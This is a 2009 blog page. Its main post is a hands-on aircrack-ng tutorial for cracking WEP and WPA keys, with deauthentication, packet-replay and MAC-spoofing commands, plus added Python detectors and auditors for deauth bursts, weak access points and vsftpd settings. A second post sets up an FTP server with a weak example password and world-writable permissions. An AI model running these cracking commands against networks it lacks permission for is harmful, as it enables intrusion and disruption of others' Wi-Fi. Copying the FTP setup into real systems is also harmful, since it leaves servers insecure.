Sunday, October 25, 2009

The LCD thread

A good place to start when you are looking for a new monitor.

How to protect your wireless home network

To understand that, we will first learn how they are actually broken ;-)
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I will use Ubuntu (Gnome desktop) under the root account with some non-default tools
apt-get install nmap macchanger
You will need to install aircrack-ng and the adapter drivers from source to get the latest version.

I got an Edimax EW-7318USg for ~$30, as it is one of the recommended devices.

Shortcuts I will use with the aircrack-ng suite.
AP-MAC - MAC address of the access point (AP)
AP-CH - channel the AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of a client already associated with the AP (needed for the DeAuth attack), ex: 012345abcdef
The interface I will use is rausb0.


Simple WEP Crack

Put the card into monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0

And let's start scanning
airodump-ng rausb0

Pick the target network and test whether we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
Test on all bitrates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0

Start capturing IVs from the target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0

Fake authentication with the access point, otherwise it will drop our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0

Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or have the access point rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes long
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use a ready-to-send packet
aireplay-ng -2 -r arp-request rausb0

When you have captured 40K to 80K data packets, you can try to crack the key
PTW method (the default in aircrack-ng 1.0; in 0.9.x it is selected with -z)
aircrack-ng -b AP-MAC output*.cap
FMS/KoreK method
aircrack-ng -K -b AP-MAC output*.cap



When no wireless clients exist

Fragmentation attack to obtain the PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain the PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0

You will get a file like "fragment-0203-180343.xor" for the next step.

Use packetforge-ng to create an ARP packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

You can inspect the created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec



How to Crack WPA/WPA2

The only way is to capture the 4-way authentication handshake
Deauthenticate a connected client once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0

For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap



Other useful stuff

MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0

But it is easier with
macchanger --mac 00:11:22:33:44:55 rausb0

Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M

Scan network for devices
nmap -sP 10.0.0.1-255

Scan services on a specific device
nmap 10.0.0.16
nmap -PN 10.0.0.16

Windows information and shares (if open)
smbclient -L 10.0.0.16
smbclient -L 10.0.0.16 -U Guest -W workgroup

Kernel modules control
lsmod | grep rt73
modprobe rt73

Trace packets with
tcpdump -n -vvv -s0 -e -i rausb0 | grep -i -E "(RA:|Authentication|ssoc)"
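The grep above shows authentication and association frames as they pass. From the network's own side, the deauthentication runs from the WPA section look like a burst of DeAuthentication frames carrying the AP's address, which a monitor-mode trace can catch. The script below is an added example, not code from this post or from aircrack-ng/tcpdump: it runs a per-BSSID sliding-window count over constructed lines written in the style of tcpdump -e output on a monitor-mode interface (the BSSID:/DA:/SA: layout and the frame names are what tcpdump prints for 802.11 management frames; the addresses, timestamps and threshold are made up for the example).

```python
import re
from collections import defaultdict, deque

# Constructed lines in the style of "tcpdump -e -i rausb0" on a monitor-mode
# interface. AP 00:11:22:33:44:55 sends one normal deauth; the frames that
# claim to come from AP 00:11:22:33:44:66 arrive six times within one second.
SAMPLE_TRACE = """\
12:00:00.100000 1.0 Mb/s 2462 MHz 11g BSSID:00:11:22:33:44:55 DA:ff:ff:ff:ff:ff:ff SA:00:11:22:33:44:55 Beacon (teddy) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY
12:00:01.000000 1.0 Mb/s 2462 MHz 11g BSSID:00:11:22:33:44:55 DA:01:23:45:ab:cd:ef SA:00:11:22:33:44:55 DeAuthentication: Class 3 frame received from nonassociated station
12:00:03.000000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:00:11:22:33:44:66 SA:01:23:45:ab:cd:ef Assoc Request (cafe) [1.0* 2.0* 5.5* 11.0* Mbit]
12:00:05.000000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:01:23:45:ab:cd:ef SA:00:11:22:33:44:66 DeAuthentication: Deauthenticated because sending station is leaving
12:00:05.200000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:01:23:45:ab:cd:ef SA:00:11:22:33:44:66 DeAuthentication: Deauthenticated because sending station is leaving
12:00:05.400000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:01:23:45:ab:cd:ef SA:00:11:22:33:44:66 DeAuthentication: Deauthenticated because sending station is leaving
12:00:05.600000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:01:23:45:ab:cd:ef SA:00:11:22:33:44:66 DeAuthentication: Deauthenticated because sending station is leaving
12:00:05.800000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:01:23:45:ab:cd:ef SA:00:11:22:33:44:66 DeAuthentication: Deauthenticated because sending station is leaving
12:00:06.000000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:01:23:45:ab:cd:ef SA:00:11:22:33:44:66 DeAuthentication: Deauthenticated because sending station is leaving
12:00:09.000000 1.0 Mb/s 2437 MHz 11g BSSID:00:11:22:33:44:66 DA:00:11:22:33:44:66 SA:01:23:45:ab:cd:ef Authentication (Open System)-1: Successful
"""

# Timestamp, BSSID and the frame subtype we care about (deauth or disassoc).
FRAME_RE = re.compile(
    r"^(?P<h>\d{2}):(?P<m>\d{2}):(?P<s>\d{2})\.(?P<us>\d{6}) .*?"
    r"BSSID:(?P<bssid>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) .*?"
    r"(?P<kind>DeAuthentication|Disassociation)",
    re.IGNORECASE,
)


def detect_deauth_bursts(lines, threshold=5, window_s=10.0):
    """Alert once per BSSID when >= threshold deauth/disassoc frames fall
    inside a window_s-second sliding window. Thresholds are example values."""
    recent = defaultdict(deque)   # bssid -> timestamps (seconds) still in window
    alerted = set()
    alerts = []
    for line in lines:
        m = FRAME_RE.search(line)
        if not m:
            continue
        t = (int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"])
             + int(m["us"]) / 1e6)
        bssid = m["bssid"].lower()
        q = recent[bssid]
        q.append(t)
        while q and t - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "kind": m["kind"],
                           "count": len(q), "window_start": q[0], "last": t})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_TRACE.splitlines()):
        print(f"{a['bssid']}: {a['count']} {a['kind']} frames in "
              f"{a['last'] - a['window_start']:.1f}s")
```

A single DeAuthentication from an AP is normal (clients leave, sessions time out); a burst of them addressed to one client, from an AP that is otherwise quiet, is the pattern to look for. Legitimate deauth rates vary by vendor, so tune the threshold on your own traffic before relying on it.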

Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager


Links

aircrack-ng tutorials and FAQ
Latest nmap

So, to protect your wireless network: don't use WEP; use WPA/WPA2 with a long and complicated passphrase; MAC filtering will only pause an attacker for a while (until he sees the MAC of one of the authenticated clients); hiding the SSID doesn't help at all.
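The advice above can be checked against your own site with the airodump-ng scan from the WEP section: airodump-ng -w output writes an output-01.csv next to the capture. The script below is an added example, not from this post or from aircrack-ng: it parses a constructed CSV in the layout airodump-ng writes (the header labels are those of aircrack-ng 1.0; the access points and the station are made up) and flags every AP that is open, still on WEP, accepts WPA (v1) or TKIP, or hides its SSID. Treating an empty ESSID column as a hidden network is an assumption of this example.

```python
import csv

# Constructed sample in the layout of an airodump-ng CSV file. The first block
# lists access points, the second block (after the blank line) lists stations.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-10-25 12:00:00, 2009-10-25 12:05:00, 11, 54, WEP, WEP, , -40, 120, 3500, 0. 0. 0. 0, 5, teddy,
00:11:22:33:44:66, 2009-10-25 12:00:01, 2009-10-25 12:05:00, 6, 54, OPN, , , -55, 80, 0, 0. 0. 0. 0, 4, cafe,
00:11:22:33:44:77, 2009-10-25 12:00:02, 2009-10-25 12:05:00, 1, 54, WPA, TKIP, PSK, -60, 90, 0, 0. 0. 0. 0, 6, oldwpa,
00:11:22:33:44:88, 2009-10-25 12:00:03, 2009-10-25 12:05:00, 11, 54, WPA2, CCMP, PSK, -45, 100, 0, 0. 0. 0. 0, 0, ,
00:11:22:33:44:99, 2009-10-25 12:00:04, 2009-10-25 12:05:00, 3, 54, WPA2, CCMP, PSK, -50, 110, 0, 0. 0. 0. 0, 4, home,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
01:23:45:ab:cd:ef, 2009-10-25 12:00:05, 2009-10-25 12:04:59, -50, 42, 00:11:22:33:44:55, teddy
"""


def parse_airodump_csv(text):
    """Return the access-point block as a list of dicts keyed by header label.
    Parsing stops at the blank line that separates APs from stations."""
    ap_lines = []
    for line in text.splitlines():
        if not line.strip():
            if ap_lines:
                break          # end of the AP block
            continue           # leading blank line
        ap_lines.append(line)
    reader = csv.reader(ap_lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if len(row) < len(header):
            continue           # truncated line (file still being written)
        aps.append({k: v.strip() for k, v in zip(header, row)})
    return aps


def audit_access_points(text):
    """Map BSSID -> {'essid', 'issues'} for every AP with a weak setting."""
    report = {}
    for ap in parse_airodump_csv(text):
        issues = []
        priv = ap["Privacy"].upper()
        if priv == "OPN":
            issues.append("OPN: no encryption at all")
        elif priv == "WEP":
            issues.append("WEP: key recoverable from captured IVs; move to WPA2")
        elif priv.startswith("WPA"):
            if priv != "WPA2":          # "WPA" or mixed "WPA2WPA"
                issues.append("accepts WPA (v1): switch to WPA2 only")
            if "TKIP" in ap["Cipher"].upper():
                issues.append("TKIP cipher allowed: use CCMP (AES)")
        if not ap["ESSID"]:             # assumption: empty ESSID = hidden network
            issues.append("hidden SSID: no protection, the name is still sent "
                          "in probe and association frames")
        if issues:
            report[ap["BSSID"].lower()] = {"essid": ap["ESSID"], "issues": issues}
    return report


if __name__ == "__main__":
    for bssid, entry in audit_access_points(SAMPLE_CSV).items():
        print(bssid, repr(entry["essid"]))
        for issue in entry["issues"]:
            print("   -", issue)
```

Only APs you own or administer belong in that CSV; the point of the audit is to find the one old router still configured for WEP or mixed WPA/WPA2 before someone else does.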


UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service

Sunday, October 11, 2009

Adobe Photoshop Color management

Adobe Photoshop Color management for dummies (like me)

Tuesday, October 6, 2009

VSFTPD and virtual user

I will show you how to install an FTP server on RedHat Linux and create a virtual user "upload" with password "kuku" for uploading and downloading files.

First, you need to run
[alexey@blogger ~]$ sudo yum install vsftpd
I got version 2.0.1
[alexey@blogger ~]$ vsftpd -v
vsftpd: version 2.0.1
then let's back up the original config
[alexey@blogger ~]$ sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.default
now we can edit the config for our needs; open it in vi
[alexey@blogger ~]$ sudo vi /etc/vsftpd/vsftpd.conf
and paste the following
listen=YES
anonymous_enable=NO
local_enable=YES
virtual_use_local_privs=YES
write_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/usr/share/empty
pam_service_name=vsftpd
guest_enable=YES
guest_username=www
local_root=/path/to/ftp-directory
chroot_local_user=YES
hide_ids=YES
dirmessage_enable=NO
tcp_wrappers=YES
check_shell=NO
userlist_enable=YES
anon_umask=0644
ftpd_banner=Welcome to my FTP!

Now we should create the virtual users' authentication file; you can use Apache's htpasswd tool.
'-c' creates a new file (omit it when adding more users), '-b' takes the password from the command line
[alexey@blogger ~]$ /usr/local/httpd/bin/htpasswd -cb /path/to/ftp/users upload kuku
Adding password for user default

Now we need to tell vsftpd how it should check users; it uses PAM, as described in
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
#%PAM-1.0
auth required pam_listfile.so item=user sense=deny file=/etc/vsftpd.ftpusers onerr=succeed
auth required pam_stack.so service=system-auth
auth required pam_shells.so
account required pam_stack.so service=system-auth
session required pam_stack.so service=system-auth
back it up with
[alexey@blogger ~]$ sudo cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.default
and paste the following
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
# MaggaPlus access
auth required pam_pwdfile.so pwdfile /path/to/ftp/users
account required pam_permit.so
[alexey@blogger ~]$

At this point you can start the daemon with
[alexey@blogger ~]$ sudo /etc/init.d/vsftpd start
and if everything is OK, try to connect to your new FTP server.

I was dealing with a problem: even when I used the username and password pair I had just created, it always returned "Invalid login". I thought the problem was in the users file and rewrote it many times. But it was just that the pwdfile module file was missing, which I found out from
[alexey@blogger ~]$ sudo tail /var/log/messages
Oct 5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct 5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/pam_pwdfile.so)
Oct 5 20:21:59 blogger vsftpd[27288]: PAM [dlerror: /lib/security/pam_pwdfile.so: cannot open shared object file: No such file
Oct 5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/pam_pwdfile.so
All PAM plugins are placed in
[alexey@blogger ~]$ ll /lib/security/
total 1884
-rwxr-xr-x 1 root root 15560 May 12 2006 pam_access.so
-rwxr-xr-x 1 root root 52334 Oct 13 2004 pam_ccreds.so
-rwxr-xr-x 1 root root 6004 May 12 2006 pam_chroot.so
...
And pam_pwdfile.so was missing :-(
I found it and installed it
[alexey@blogger ~]$ sudo rpm -i pam-pam_pwdfile-0.99-2.i586.rpm
warning: pam-pam_pwdfile-0.99-2.i586.rpm: V3 DSA signature: NOKEY, key ID 1bbd5459
Now it is fine, and FTP auth works!
[alexey@blogger ~]$ ll /lib/security/pam_pwdfile.so
-rwxr-xr-x 1 root root 14572 Jul 30 2004 /lib/security/pam_pwdfile.so
Make sure the FTP root is readable and writable by the specified user
[alexey@blogger ~]$ chmod 777 -R /path/to/ftp-directory
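Two of the steps above deserve a check before the server goes live: the configuration pasted into vsftpd.conf and the chmod 777 -R on the FTP root. The Python below is an added example, not from this post or from vsftpd: it lints a constructed copy of the config above and reports a world-writable root. The vsftpd defaults it relies on (anonymous_enable=YES, guest_username=ftp, both umasks 077, umask values read as octal) are taken from vsftpd's own documentation; the finding texts are this example's.

```python
import stat

# Constructed copy of the vsftpd.conf shown above, used as the sample input.
SAMPLE_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
virtual_use_local_privs=YES
write_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/usr/share/empty
pam_service_name=vsftpd
guest_enable=YES
guest_username=www
local_root=/path/to/ftp-directory
chroot_local_user=YES
hide_ids=YES
dirmessage_enable=NO
tcp_wrappers=YES
check_shell=NO
userlist_enable=YES
anon_umask=0644
ftpd_banner=Welcome to my FTP!
"""


def parse_vsftpd_conf(text):
    """key=value lines; '#' starts a comment (vsftpd allows no spaces around '=')."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key] = value
    return conf


def is_yes(conf, key, default="NO"):
    return conf.get(key, default).upper() == "YES"


def resulting_file_mode(umask_text):
    """Mode of a newly uploaded file: 0666 & ~umask, with the umask read as octal."""
    return 0o666 & ~int(umask_text, 8) & 0o777


def lint_vsftpd_conf(text):
    conf = parse_vsftpd_conf(text)
    findings = []
    if is_yes(conf, "anonymous_enable", default="YES"):      # vsftpd default is YES
        findings.append("anonymous_enable: anonymous logins allowed (vsftpd's default); "
                        "set anonymous_enable=NO")
    if is_yes(conf, "guest_enable") and "guest_username" not in conf:
        findings.append("guest_enable=YES without guest_username: virtual users run as "
                        "the default 'ftp' account")
    if (is_yes(conf, "local_enable") or is_yes(conf, "guest_enable")) \
            and not is_yes(conf, "chroot_local_user"):
        findings.append("chroot_local_user is not YES: users can browse outside local_root")
    # With virtual_use_local_privs=YES virtual users get local_umask (default 077);
    # otherwise anon_umask (default 077) applies. Check whichever keys are set.
    for key in ("local_umask", "anon_umask"):
        if key not in conf:
            continue
        try:
            mode = resulting_file_mode(conf[key])
        except ValueError:
            findings.append(f"{key}={conf[key]}: not a valid octal umask")
            continue
        if mode & 0o022:
            findings.append(f"{key}={conf[key]}: new files would get mode {mode:04o} "
                            "(group/other-writable); use 022 or 077")
    return findings


def check_ftp_root_mode(mode):
    """Finding for a world-writable FTP root (what 'chmod 777 -R' produces), else None."""
    if mode & stat.S_IWOTH:
        return (f"FTP root mode {mode & 0o777:04o} is world-writable; chown it to "
                "guest_username and use 0755 instead")
    return None


if __name__ == "__main__":
    for f in lint_vsftpd_conf(SAMPLE_CONF):
        print("-", f)
    print("-", check_ftp_root_mode(0o777))
```

On the config above the linter flags anon_umask=0644: vsftpd reads umasks as octal, so 0644 strips the owner's read and write bits and leaves new files group- and other-writable (0022). It is harmless only because virtual_use_local_privs=YES makes local_umask, not anon_umask, apply to the virtual user. For the FTP root, chown -R www /path/to/ftp-directory followed by chmod -R u=rwX,go=rX gives the guest user write access without making the tree writable by every local account.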

[alexey@blogger ~]$ ftp localhost
Connected to localhost (127.0.0.1).
220 Welcome to my FTP!
Name (blogger:alexey): upload
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> close
221 Goodbye.
ftp> bye
[alexey@blogger ~]$

Information used